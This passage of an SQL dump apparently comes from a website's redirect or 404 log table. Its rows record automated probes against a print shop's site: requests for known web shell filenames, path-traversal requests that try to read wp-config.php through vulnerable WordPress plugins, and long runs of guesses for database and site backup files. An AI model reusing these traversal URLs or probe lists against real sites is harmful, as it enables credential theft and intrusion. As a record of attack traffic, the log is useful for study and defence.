00:00:00',301),(3331,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/flash/setup.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/flash/setup.php','',1,0,'2017-01-02 20:57:33','0000-00-00 00:00:00',301),(3332,'http://ekvatorprint.com.ua/plugins/content/defense.php',NULL,'http://ekvatorprint.com.ua/plugins/content/defense.php','',5,0,'2017-01-02 20:57:34','0000-00-00 00:00:00',301),(3333,'http://ekvatorprint.com.ua/plugins/content/apismtp/index1.php',NULL,'http://ekvatorprint.com.ua/plugins/content/apismtp/index1.php','',1,0,'2017-01-02 20:57:34','0000-00-00 00:00:00',301),(3334,'http://ekvatorprint.com.ua/opts.php',NULL,'http://ekvatorprint.com.ua/opts.php','',1,0,'2017-01-02 20:57:34','0000-00-00 00:00:00',301),(3335,'http://ekvatorprint.com.ua/platform.php',NULL,'http://ekvatorprint.com.ua/platform.php','',1,0,'2017-01-02 20:57:34','0000-00-00 00:00:00',301),(3336,'http://ekvatorprint.com.ua/modules/wp-stats.php',NULL,'http://ekvatorprint.com.ua/modules/wp-stats.php','',1,0,'2017-01-02 20:57:35','0000-00-00 00:00:00',301),(3337,'http://ekvatorprint.com.ua/plugins/logo_img.php',NULL,'http://ekvatorprint.com.ua/plugins/logo_img.php','',9,0,'2017-01-02 20:58:02','0000-00-00 00:00:00',301),(3338,'http://ekvatorprint.com.ua/plugins/system/anticopy/anticopy.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/system/anticopy/anticopy.php.suspected','',3,0,'2017-01-02 20:58:02','0000-00-00 00:00:00',301),(3339,'http://ekvatorprint.com.ua/plugins/system/anticopy/debug.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/system/anticopy/debug.php.suspected','',3,0,'2017-01-02 20:58:03','0000-00-00 00:00:00',301),(3340,'http://ekvatorprint.com.ua/plugins/system/rsforms.php',NULL,'http://ekvatorprint.com.ua/plugins/system/rsforms.php','',4,0,'2017-01-02 20:58:29','0000-00-00 00:00:00',301),(3341,'http://ekvatorprint.com.ua/system.php.suspected',NULL,'http://ekvatorprint.com.ua/system.php.suspected','',2,0,'2017-01-02 20:58:29','0000-00-00 00:00:00',301),(3342,'http://ekvatorprint.com.ua/plugins/system/thumbs.php',NULL,'http://ekvatorprint.com.ua/plugins/system/thumbs.php','',1,0,'2017-01-02 20:58:30','0000-00-00 00:00:00',301),(3343,'http://ekvatorprint.com.ua/readme.php',NULL,'http://ekvatorprint.com.ua/readme.php','',4,0,'2017-01-02 20:58:31','0000-00-00 00:00:00',301),(3344,'http://ekvatorprint.com.ua/s1.php',NULL,'http://ekvatorprint.com.ua/s1.php','',1,0,'2017-01-02 20:58:31','0000-00-00 00:00:00',301),(3345,'http://ekvatorprint.com.ua/templates/beez/component.php',NULL,'http://ekvatorprint.com.ua/templates/beez/component.php','',1,0,'2017-01-02 20:59:02','0000-00-00 00:00:00',301),(3346,'http://ekvatorprint.com.ua/templates/beez3/images/zonfig.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/images/zonfig.php','',1,0,'2017-01-02 20:59:02','0000-00-00 00:00:00',301),(3347,'http://ekvatorprint.com.ua/templates/beez/modules.php',NULL,'http://ekvatorprint.com.ua/templates/beez/modules.php','',1,0,'2017-01-02 20:59:03','0000-00-00 00:00:00',301),(3348,'http://ekvatorprint.com.ua/templates/beez3/html/com_weblinks/categories/incluide.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/html/com_weblinks/categories/incluide.php','',1,0,'2017-01-02 20:59:03','0000-00-00 00:00:00',301),(3349,'http://ekvatorprint.com.ua/templates/logo_img.php',NULL,'http://ekvatorprint.com.ua/templates/logo_img.php','',12,0,'2017-01-02 20:59:30','0000-00-00 00:00:00',301),(3350,'http://ekvatorprint.com.ua/tmp/install_51b72a623fd6e/mod_system.php',NULL,'http://ekvatorprint.com.ua/tmp/install_51b72a623fd6e/mod_system.php','',1,0,'2017-01-02 20:59:30','0000-00-00 00:00:00',301),(3351,'http://ekvatorprint.com.ua/wp-admin/includes/system.php',NULL,'http://ekvatorprint.com.ua/wp-admin/includes/system.php','',1,0,'2017-01-02 21:00:00','0000-00-00 00:00:00',301),(3352,'http://ekvatorprint.com.ua/wp-admin/images/system.php',NULL,'http://ekvatorprint.com.ua/wp-admin/images/system.php','',1,0,'2017-01-02 21:00:01','0000-00-00 00:00:00',301),(3353,'http://ekvatorprint.com.ua/wp-admin/js/system.php',NULL,'http://ekvatorprint.com.ua/wp-admin/js/system.php','',1,0,'2017-01-02 21:00:01','0000-00-00 00:00:00',301),(3354,'http://ekvatorprint.com.ua/wp-admin/maint/system.php',NULL,'http://ekvatorprint.com.ua/wp-admin/maint/system.php','',1,0,'2017-01-02 21:00:01','0000-00-00 00:00:00',301),(3355,'http://ekvatorprint.com.ua/tmp/xml.php',NULL,'http://ekvatorprint.com.ua/tmp/xml.php','',2,0,'2017-01-02 21:00:01','0000-00-00 00:00:00',301),(3356,'http://ekvatorprint.com.ua/wso.php',NULL,'http://ekvatorprint.com.ua/wso.php','',7,0,'2017-01-02 21:00:30','0000-00-00 00:00:00',301),(3357,'http://ekvatorprint.com.ua/xmlrpc/logo_img.php',NULL,'http://ekvatorprint.com.ua/xmlrpc/logo_img.php','',7,0,'2017-01-02 21:00:31','0000-00-00 00:00:00',301),(3358,'http://ekvatorprint.com.ua/index.php?option=com_remository&Itemid=1&func=addfile',NULL,'','',1,0,'2017-01-03 15:14:38','0000-00-00 00:00:00',301),(3359,'http://ekvatorprint.com.ua/ekvatorprint.com.ua/banner-printing',NULL,'','',4,0,'2017-01-04 06:51:58','0000-00-00 00:00:00',301),(3360,'http://ekvatorprint.com.ua/error-logs.php',NULL,'http://ekvatorprint.com.ua/error-logs.php','',3,0,'2017-01-04 20:24:17','0000-00-00 00:00:00',301),(3361,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/revslider/xxx.php',NULL,'','',9,0,'2017-01-06 06:03:00','0000-00-00 00:00:00',301),(3362,'http://ekvatorprint.com.ua/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php',NULL,'','',9,0,'2017-01-06 06:05:06','0000-00-00 00:00:00',301),(3363,'http://ekvatorprint.com.ua/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/.libs.php',NULL,'','',9,0,'2017-01-06 06:06:19','0000-00-00 00:00:00',301),(3364,'http://ekvatorprint.com.ua/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php',NULL,'','',9,0,'2017-01-06 06:06:31','0000-00-00 00:00:00',301),(3365,'http://ekvatorprint.com.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr',NULL,'','',9,0,'2017-01-06 06:07:44','0000-00-00 00:00:00',301),(3366,'http://ekvatorprint.com.ua/bin/logo_img.php',NULL,'http://ekvatorprint.com.ua/bin/logo_img.php','',7,0,'2017-01-08 10:51:16','0000-00-00 00:00:00',301),(3367,'http://ekvatorprint.com.ua/images/map(umviv0sp8sfy_uic4urb5dn6lzo).svg',NULL,'http://ekvatorprint.com.ua/modulnye-kartiny','',2,0,'2017-01-08 12:08:16','0000-00-00 00:00:00',301),(3368,'http://ekvatorprint.com.ua/ekvatorjoomla',NULL,'','',1,0,'2017-01-08 12:19:01','0000-00-00 00:00:00',301),(3369,'http://ekvatorprint.com.ua/sites/all/themes/jysk_bootstrap/images/gfx/icons/icons.svg',NULL,'http://ekvatorprint.com.ua/internet-katalog-modulnykh-kartin','',1,0,'2017-01-08 14:09:06','0000-00-00 00:00:00',301),(3370,'http://ekvatorprint.com.ua/libraries/joomla/web.php',NULL,'','',1,0,'2017-01-08 19:04:22','0000-00-00 00:00:00',301),(3371,'http://ekvatorprint.com.ua/database/',NULL,'http://ekvatorprint.com.ua/','',4,0,'2017-01-09 12:41:09','0000-00-00 00:00:00',301),(3372,'http://ekvatorprint.com.ua/sql/',NULL,'http://ekvatorprint.com.ua/','',5,0,'2017-01-09 12:41:09','0000-00-00 00:00:00',301),(3373,'http://ekvatorprint.com.ua/DB/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:09','0000-00-00 00:00:00',301),(3374,'http://ekvatorprint.com.ua/db/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-01-09 12:41:09','0000-00-00 00:00:00',301),(3375,'http://ekvatorprint.com.ua/Sql/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2017-01-09 12:41:09','0000-00-00 00:00:00',301),(3376,'http://ekvatorprint.com.ua/data/SQL/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:09','0000-00-00 00:00:00',301),(3377,'http://ekvatorprint.com.ua/sqlDatabase/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:10','0000-00-00 00:00:00',301),(3378,'http://ekvatorprint.com.ua/db1/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:10','0000-00-00 00:00:00',301),(3379,'http://ekvatorprint.com.ua/_database/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:10','0000-00-00 00:00:00',301),(3380,'http://ekvatorprint.com.ua/back-up/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:10','0000-00-00 00:00:00',301),(3381,'http://ekvatorprint.com.ua/uploads/',NULL,'http://ekvatorprint.com.ua/','',4,0,'2017-01-09 12:41:10','0000-00-00 00:00:00',301),(3382,'http://ekvatorprint.com.ua/SQL/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2017-01-09 12:41:10','0000-00-00 00:00:00',301),(3383,'http://ekvatorprint.com.ua/data/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:10','0000-00-00 00:00:00',301),(3384,'http://ekvatorprint.com.ua/_sql/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:11','0000-00-00 00:00:00',301),(3385,'http://ekvatorprint.com.ua/files/',NULL,'http://ekvatorprint.com.ua/','',4,0,'2017-01-09 12:41:11','0000-00-00 00:00:00',301),(3386,'http://ekvatorprint.com.ua/backup_DB/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:11','0000-00-00 00:00:00',301),(3387,'http://ekvatorprint.com.ua/DataBase/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2017-01-09 12:41:11','0000-00-00 00:00:00',301),(3388,'http://ekvatorprint.com.ua/BACKUP/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-01-09 12:41:11','0000-00-00 00:00:00',301),(3389,'http://ekvatorprint.com.ua/Backup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2017-01-09 12:41:11','0000-00-00 00:00:00',301),(3390,'http://ekvatorprint.com.ua/archive/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-01-09 12:41:11','0000-00-00 00:00:00',301),(3391,'http://ekvatorprint.com.ua/images/funtoplay/home-bg.jpg',NULL,'http://ekvatorprint.com.ua/contacts','',1,0,'2017-01-09 17:57:54','0000-00-00 00:00:00',301),(3392,'http://ekvatorprint.com.ua/media/jmail.php',NULL,'','',2,0,'2017-01-09 18:56:19','0000-00-00 00:00:00',301),(3393,'http://ekvatorprint.com.ua/media/mass.php',NULL,'','',4,0,'2017-01-09 18:56:20','0000-00-00 00:00:00',301),(3394,'http://ekvatorprint.com.ua/cli/40dd1d.php',NULL,'http://ekvatorprint.com.ua/cli/40dd1d.php','',1,0,'2017-01-10 20:49:48','0000-00-00 00:00:00',301),(3395,'http://ekvatorprint.com.ua/wp-content/plugins/foolcar/foolcar.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-01-10 22:09:43','0000-00-00 00:00:00',301),(3396,'http://ekvatorprint.com.ua/wp-content/plugins/hello.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-01-10 22:11:29','0000-00-00 00:00:00',301),(3397,'http://ekvatorprint.com.ua/wp-includes/pomo/foolcar.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-01-10 22:15:13','0000-00-00 00:00:00',301),(3398,'http://ekvatorprint.com.ua/ytt.php',NULL,'ekvatorprint.com.ua','',9,0,'2017-01-11 01:56:32','0000-00-00 00:00:00',301),(3399,'http://ekvatorprint.com.ua/yt2.php',NULL,'ekvatorprint.com.ua','',8,0,'2017-01-11 02:00:09','0000-00-00 00:00:00',301),(3400,'http://ekvatorprint.com.ua/price//images/stories/explore.gif',NULL,'','',1,0,'2017-01-11 07:24:43','0000-00-00 00:00:00',301),(3401,'http://ekvatorprint.com.ua//images/stories/explore.gif',NULL,'','',2,0,'2017-01-11 07:24:53','0000-00-00 00:00:00',301),(3402,'http://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.sql.gz',NULL,'','',6,0,'2017-01-11 09:57:20','0000-00-00 00:00:00',301),(3403,'http://ekvatorprint.com.ua/db_backup.ekvatorprint.sql.gz',NULL,'','',6,0,'2017-01-11 09:57:20','0000-00-00 00:00:00',301),(3404,'http://ekvatorprint.com.ua/db_backup.sql.gz',NULL,'','',6,0,'2017-01-11 09:57:21','0000-00-00 00:00:00',301),(3405,'http://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.sql',NULL,'','',6,0,'2017-01-11 09:57:21','0000-00-00 00:00:00',301),(3406,'http://ekvatorprint.com.ua/db_backup.ekvatorprint.sql',NULL,'','',6,0,'2017-01-11 09:57:21','0000-00-00 00:00:00',301),(3407,'http://ekvatorprint.com.ua/Dump.sql',NULL,'','',6,0,'2017-01-11 09:57:21','0000-00-00 00:00:00',301),(3408,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.sql',NULL,'','',9,0,'2017-01-11 09:57:22','0000-00-00 00:00:00',301),(3409,'http://ekvatorprint.com.ua/ekvatorprint.sql',NULL,'','',7,0,'2017-01-11 09:57:22','0000-00-00 00:00:00',301),(3410,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.bak',NULL,'','',7,0,'2017-01-11 09:57:22','0000-00-00 00:00:00',301),(3411,'http://ekvatorprint.com.ua/ekvatorprint.bak',NULL,'','',6,0,'2017-01-11 09:57:22','0000-00-00 00:00:00',301),(3412,'http://ekvatorprint.com.ua/backup.sql.zip',NULL,'','',6,0,'2017-01-11 09:57:22','0000-00-00 00:00:00',301),(3413,'http://ekvatorprint.com.ua/configuration.php~',NULL,'','',11,0,'2017-01-11 09:57:23','0000-00-00 00:00:00',301),(3414,'http://ekvatorprint.com.ua/wp-config.php.bak',NULL,'','',9,0,'2017-01-11 09:57:23','0000-00-00 00:00:00',301),(3415,'http://ekvatorprint.com.ua/wp-config.bak.php',NULL,'','',6,0,'2017-01-11 09:57:23','0000-00-00 00:00:00',301),(3416,'http://ekvatorprint.com.ua/configuration.php.bak',NULL,'','',10,0,'2017-01-11 09:57:23','0000-00-00 00:00:00',301),(3417,'http://ekvatorprint.com.ua/configuration.php.old',NULL,'','',8,0,'2017-01-11 09:57:23','0000-00-00 00:00:00',301),(3418,'http://ekvatorprint.com.ua/_db_.sql',NULL,'','',6,0,'2017-01-11 09:57:24','0000-00-00 00:00:00',301),(3419,'http://ekvatorprint.com.ua/_DB_.sql',NULL,'','',5,0,'2017-01-11 09:57:24','0000-00-00 00:00:00',301),(3420,'http://ekvatorprint.com.ua/_DB_.sql.zip',NULL,'','',6,0,'2017-01-11 09:57:24','0000-00-00 00:00:00',301),(3421,'http://ekvatorprint.com.ua/_DB_.tar.gz',NULL,'','',6,0,'2017-01-11 09:57:24','0000-00-00 00:00:00',301),(3422,'http://ekvatorprint.com.ua/sql.txt',NULL,'','',7,0,'2017-01-11 09:57:24','0000-00-00 00:00:00',301),(3423,'http://ekvatorprint.com.ua/database.sql',NULL,'','',8,0,'2017-01-11 09:57:24','0000-00-00 00:00:00',301),(3424,'http://ekvatorprint.com.ua/localhost.sql',NULL,'','',8,0,'2017-01-11 09:57:24','0000-00-00 00:00:00',301),(3425,'http://ekvatorprint.com.ua/sql.sql',NULL,'','',11,0,'2017-01-11 09:57:25','0000-00-00 00:00:00',301),(3426,'http://ekvatorprint.com.ua/bak.sql',NULL,'','',6,0,'2017-01-11 09:57:25','0000-00-00 00:00:00',301),(3427,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.bak.sql',NULL,'','',6,0,'2017-01-11 09:57:25','0000-00-00 00:00:00',301),(3428,'http://ekvatorprint.com.ua/ekvatorprint.bak.sql',NULL,'','',6,0,'2017-01-11 09:57:25','0000-00-00 00:00:00',301),(3429,'http://ekvatorprint.com.ua/data.sql',NULL,'','',9,0,'2017-01-11 09:57:25','0000-00-00 00:00:00',301),(3430,'http://ekvatorprint.com.ua/backup.bz2',NULL,'','',5,0,'2017-01-11 09:57:28','0000-00-00 00:00:00',301),(3431,'http://ekvatorprint.com.ua/backup.gz',NULL,'','',5,0,'2017-01-11 09:57:28','0000-00-00 00:00:00',301),(3432,'http://ekvatorprint.com.ua/backup.rar',NULL,'','',7,0,'2017-01-11 09:57:28','0000-00-00 00:00:00',301),(3433,'http://ekvatorprint.com.ua/backup.tar',NULL,'','',5,0,'2017-01-11 09:57:28','0000-00-00 00:00:00',301),(3434,'http://ekvatorprint.com.ua/backup.tar.gz',NULL,'','',7,0,'2017-01-11 09:57:28','0000-00-00 00:00:00',301),(3435,'http://ekvatorprint.com.ua/backup.tgz',NULL,'','',5,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3436,'http://ekvatorprint.com.ua/backup.zip',NULL,'','',8,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3437,'http://ekvatorprint.com.ua/backup/backup.bz2',NULL,'','',4,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3438,'http://ekvatorprint.com.ua/backup/backup.gz',NULL,'','',4,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3439,'http://ekvatorprint.com.ua/backup/backup.rar',NULL,'','',4,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3440,'http://ekvatorprint.com.ua/backup/backup.tar',NULL,'','',4,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3441,'http://ekvatorprint.com.ua/backup/backup.tar.gz',NULL,'','',4,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3442,'http://ekvatorprint.com.ua/backup/backup.tgz',NULL,'','',4,0,'2017-01-11 09:57:29','0000-00-00 00:00:00',301),(3443,'http://ekvatorprint.com.ua/backup/backup.zip',NULL,'','',4,0,'2017-01-11 09:57:30','0000-00-00 00:00:00',301),(3444,'http://ekvatorprint.com.ua/dump.rar',NULL,'','',6,0,'2017-01-11 09:57:30','0000-00-00 00:00:00',301),(3445,'http://ekvatorprint.com.ua/dump.sql.gz',NULL,'','',6,0,'2017-01-11 09:57:30','0000-00-00 00:00:00',301),(3446,'http://ekvatorprint.com.ua/dump.sql.tgz',NULL,'','',5,0,'2017-01-11 09:57:30','0000-00-00 00:00:00',301),(3447,'http://ekvatorprint.com.ua/dump.tar',NULL,'','',8,0,'2017-01-11 09:57:30','0000-00-00 00:00:00',301),(3448,'http://ekvatorprint.com.ua/dump.tar.gz',NULL,'','',8,0,'2017-01-11 09:57:31','0000-00-00 00:00:00',301),(3449,'http://ekvatorprint.com.ua/dump.tgz',NULL,'','',8,0,'2017-01-11 09:57:31','0000-00-00 00:00:00',301),(3450,'http://ekvatorprint.com.ua/dump.zip',NULL,'','',8,0,'2017-01-11 09:57:31','0000-00-00 00:00:00',301),(3451,'http://ekvatorprint.com.ua/home.rar',NULL,'','',5,0,'2017-01-11 09:57:31','0000-00-00 00:00:00',301),(3452,'http://ekvatorprint.com.ua/home.tar',NULL,'','',5,0,'2017-01-11 09:57:31','0000-00-00 00:00:00',301),(3453,'http://ekvatorprint.com.ua/home.tar.gz',NULL,'','',5,0,'2017-01-11 09:57:31','0000-00-00 00:00:00',301),(3454,'http://ekvatorprint.com.ua/home.tgz',NULL,'','',4,0,'2017-01-11 09:57:32','0000-00-00 00:00:00',301),(3455,'http://ekvatorprint.com.ua/home.zip',NULL,'','',5,0,'2017-01-11 09:57:32','0000-00-00 00:00:00',301),(3456,'http://ekvatorprint.com.ua/htdocs.tar',NULL,'','',4,0,'2017-01-11 09:57:32','0000-00-00 00:00:00',301),(3457,'http://ekvatorprint.com.ua/htdocs.tar.gz',NULL,'','',4,0,'2017-01-11 09:57:32','0000-00-00 00:00:00',301),(3458,'http://ekvatorprint.com.ua/htdocs.zip',NULL,'','',4,0,'2017-01-11 09:57:32','0000-00-00 00:00:00',301),(3459,'http://ekvatorprint.com.ua/htodcs.rar',NULL,'','',4,0,'2017-01-11 09:57:32','0000-00-00 00:00:00',301),(3460,'http://ekvatorprint.com.ua/public_html.rar',NULL,'','',3,0,'2017-01-11 09:57:33','0000-00-00 00:00:00',301),(3461,'http://ekvatorprint.com.ua/public_html.tar',NULL,'','',4,0,'2017-01-11 09:57:33','0000-00-00 00:00:00',301),(3462,'http://ekvatorprint.com.ua/public_html.tar.gz',NULL,'','',6,0,'2017-01-11 09:57:33','0000-00-00 00:00:00',301),(3463,'http://ekvatorprint.com.ua/public_html.tgz',NULL,'','',4,0,'2017-01-11 09:57:33','0000-00-00 00:00:00',301),(3464,'http://ekvatorprint.com.ua/site.rar',NULL,'','',5,0,'2017-01-11 09:57:33','0000-00-00 00:00:00',301),(3465,'http://ekvatorprint.com.ua/site.tar',NULL,'','',3,0,'2017-01-11 09:57:33','0000-00-00 00:00:00',301),(3466,'http://ekvatorprint.com.ua/site.tar.gz',NULL,'','',5,0,'2017-01-11 09:57:34','0000-00-00 00:00:00',301),(3467,'http://ekvatorprint.com.ua/site.tgz',NULL,'','',4,0,'2017-01-11 09:57:34','0000-00-00 00:00:00',301),(3468,'http://ekvatorprint.com.ua/site.zip',NULL,'','',4,0,'2017-01-11 09:57:34','0000-00-00 00:00:00',301),(3469,'http://ekvatorprint.com.ua/upload.rar',NULL,'','',4,0,'2017-01-11 09:57:34','0000-00-00 00:00:00',301),(3470,'http://ekvatorprint.com.ua/upload.zip',NULL,'','',4,0,'2017-01-11 09:57:34','0000-00-00 00:00:00',301),(3471,'http://ekvatorprint.com.ua/web.rar',NULL,'','',4,0,'2017-01-11 09:57:34','0000-00-00 00:00:00',301),(3472,'http://ekvatorprint.com.ua/web.tar',NULL,'','',4,0,'2017-01-11 09:57:34','0000-00-00 00:00:00',301),(3473,'http://ekvatorprint.com.ua/web.tar.gz',NULL,'','',4,0,'2017-01-11 09:57:35','0000-00-00 00:00:00',301),(3474,'http://ekvatorprint.com.ua/web.zip',NULL,'','',6,0,'2017-01-11 09:57:35','0000-00-00 00:00:00',301),(3475,'http://ekvatorprint.com.ua/www.gz',NULL,'','',4,0,'2017-01-11 09:57:35','0000-00-00 00:00:00',301),(3476,'http://ekvatorprint.com.ua/www.rar',NULL,'','',4,0,'2017-01-11 09:57:35','0000-00-00 00:00:00',301),(3477,'http://ekvatorprint.com.ua/www.tar',NULL,'','',4,0,'2017-01-11 09:57:35','0000-00-00 00:00:00',301),(3478,'http://ekvatorprint.com.ua/www.tar.bz2',NULL,'','',4,0,'2017-01-11 09:57:35','0000-00-00 00:00:00',301),(3479,'http://ekvatorprint.com.ua/www.tar.gz',NULL,'','',4,0,'2017-01-11 09:57:36','0000-00-00 00:00:00',301),(3480,'http://ekvatorprint.com.ua/www.tgz',NULL,'','',4,0,'2017-01-11 09:57:36','0000-00-00 00:00:00',301),(3481,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.gz',NULL,'','',4,0,'2017-01-11 09:57:36','0000-00-00 00:00:00',301),(3482,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.rar',NULL,'','',4,0,'2017-01-11 09:57:36','0000-00-00 00:00:00',301),(3483,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.sql',NULL,'','',4,0,'2017-01-11 09:57:36','0000-00-00 00:00:00',301),(3484,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.sql.gz',NULL,'','',4,0,'2017-01-11 09:57:37','0000-00-00 00:00:00',301),(3485,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.tar',NULL,'','',4,0,'2017-01-11 09:57:37','0000-00-00 00:00:00',301),(3486,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.tar.gz',NULL,'','',4,0,'2017-01-11 09:57:37','0000-00-00 00:00:00',301),(3487,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.tgz',NULL,'','',4,0,'2017-01-11 09:57:37','0000-00-00 00:00:00',301),(3488,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.zip',NULL,'','',4,0,'2017-01-11 09:57:37','0000-00-00 00:00:00',301),(3489,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.7z',NULL,'','',4,0,'2017-01-11 09:57:37','0000-00-00 00:00:00',301),(3490,'http://ekvatorprint.com.ua/www.ekvatorprint.gz',NULL,'','',4,0,'2017-01-11 09:57:37','0000-00-00 00:00:00',301),(3491,'http://ekvatorprint.com.ua/www.ekvatorprint.rar',NULL,'','',4,0,'2017-01-11 09:57:38','0000-00-00 00:00:00',301),(3492,'http://ekvatorprint.com.ua/www.ekvatorprint.sql',NULL,'','',4,0,'2017-01-11 09:57:38','0000-00-00 00:00:00',301),(3493,'http://ekvatorprint.com.ua/www.ekvatorprint.sql.gz',NULL,'','',4,0,'2017-01-11 09:57:38','0000-00-00 00:00:00',301),(3494,'http://ekvatorprint.com.ua/www.ekvatorprint.tar',NULL,'','',4,0,'2017-01-11 09:57:38','0000-00-00 00:00:00',301),(3495,'http://ekvatorprint.com.ua/www.ekvatorprint.tar.gz',NULL,'','',4,0,'2017-01-11 09:57:38','0000-00-00 00:00:00',301),(3496,'http://ekvatorprint.com.ua/www.ekvatorprint.tgz',NULL,'','',4,0,'2017-01-11 09:57:38','0000-00-00 00:00:00',301),(3497,'http://ekvatorprint.com.ua/www.ekvatorprint.zip',NULL,'','',4,0,'2017-01-11 09:57:39','0000-00-00 00:00:00',301),(3498,'http://ekvatorprint.com.ua/www.ekvatorprint.7z',NULL,'','',4,0,'2017-01-11 09:57:39','0000-00-00 00:00:00',301),(3499,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.gz',NULL,'','',4,0,'2017-01-11 09:57:39','0000-00-00 00:00:00',301),(3500,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.rar',NULL,'','',6,0,'2017-01-11 09:57:39','0000-00-00 00:00:00',301),(3501,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.gz',NULL,'','',5,0,'2017-01-11 09:57:39','0000-00-00 00:00:00',301),(3502,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.tar',NULL,'','',6,0,'2017-01-11 09:57:39','0000-00-00 00:00:00',301),(3503,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.tar.gz',NULL,'','',7,0,'2017-01-11 09:57:40','0000-00-00 00:00:00',301),(3504,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.zip',NULL,'','',7,0,'2017-01-11 09:57:40','0000-00-00 00:00:00',301),(3505,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.7z',NULL,'','',5,0,'2017-01-11 09:57:40','0000-00-00 00:00:00',301),(3506,'http://ekvatorprint.com.ua/include.class.php',NULL,'ekvatorprint.com.ua','',5,0,'2017-01-12 12:22:31','0000-00-00 00:00:00',301),(3507,'http://ekvatorprint.com.ua/media/jui/js/).length,l.html5Clone=',NULL,'','',2,0,'2017-01-12 12:47:41','0000-00-00 00:00:00',301),(3508,'http://ekvatorprint.com.ua/media/jui/js/).length,l.htmlSerialize=!!a.getElementsByTagName(',NULL,'','',2,0,'2017-01-12 12:47:42','0000-00-00 00:00:00',301),(3509,'http://ekvatorprint.com.ua/media/jui/js/)},clone:function(a,b,c){var d,e,f,g,h,i=n.contains(a.ownerDocument,a);if(l.html5Clone||n.isXMLDoc(a)||!ua.test(',NULL,'','',2,0,'2017-01-12 12:47:43','0000-00-00 00:00:00',301),(3510,'http://ekvatorprint.com.ua/media/jui/js/,data:b}).done(function(a){f=arguments,g.html(d?n(',NULL,'','',2,0,'2017-01-12 12:47:44','0000-00-00 00:00:00',301),(3511,'http://ekvatorprint.com.ua/media/jui/js/==typeof a&&!wa.test(a)&&(l.htmlSerialize||!ua.test(a))&&(l.leadingWhitespace||!aa.test(a))&&!da[($.exec(a)||[',NULL,'','',2,0,'2017-01-12 12:47:44','0000-00-00 00:00:00',301),(3512,'http://ekvatorprint.com.ua/media/jui/js/])[1].toLowerCase(),m=da[j]||da._default,i.innerHTML=m[1]+n.htmlPrefilter(g)+m[2],f=m[0];while(f--)i=i.lastChild;if(!l.leadingWhitespace&&aa.test(g)&&q.push(b.createTextNode(aa.exec(g)[0])),!l.tbody){g=',NULL,'','',2,0,'2017-01-12 12:47:45','0000-00-00 00:00:00',301),(3513,'http://ekvatorprint.com.ua/media/jui/js/],_default:l.htmlSerialize?[0,',NULL,'','',2,0,'2017-01-12 12:47:46','0000-00-00 00:00:00',301),(3514,'http://ekvatorprint.com.ua/popup.html',NULL,'','',3,0,'2017-01-12 12:47:51','0000-00-00 00:00:00',301),(3515,'http://ekvatorprint.com.ua/tooltip.html',NULL,'','',2,0,'2017-01-12 12:47:52','0000-00-00 00:00:00',301),(3516,'http://ekvatorprint.com.ua/docs.google.com/viewer?url=',NULL,'','',2,0,'2017-01-12 12:47:53','0000-00-00 